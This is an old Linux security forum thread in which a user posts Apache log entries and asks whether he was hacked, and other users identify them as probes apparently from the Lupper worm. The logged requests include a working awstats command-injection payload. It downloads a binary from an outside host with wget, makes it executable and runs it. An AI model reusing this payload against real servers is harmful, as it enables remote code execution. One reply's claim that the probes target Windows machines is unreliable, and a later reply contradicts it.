LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   Apache entries - Hacked?? (https://www.linuxquestions.org/questions/linux-security-4/apache-entries-hacked-387115/)

lawadm1 11-27-2005 08:06 PM
Apache entries - Hacked??
 
I found the following entries in my access_log that I have never received before. It looks like they were all 404, but I would feel much better if someone verified it. TIA Jeff

211.214.161.159 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:27 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:28 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:32 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

lord-fu 11-27-2005 08:22 PM
Hi,

Not a security expert but I have seen those in my logs as well and they are looking for those files on windoze machines. I believe IMHO that you can safely ignore those...however I am no expert and I am sure someone else will give their input as well.

btmiller 11-27-2005 08:49 PM
I think they are looking for *nix boxen, since these look a lot like hits from the Lupper worm, which attacks several vulnerable Web applications. I've seen this on a number of servers, and so long as you don't have the vulnerable applications installed, you are OK.


All times are GMT -5. The time now is 02:24 AM.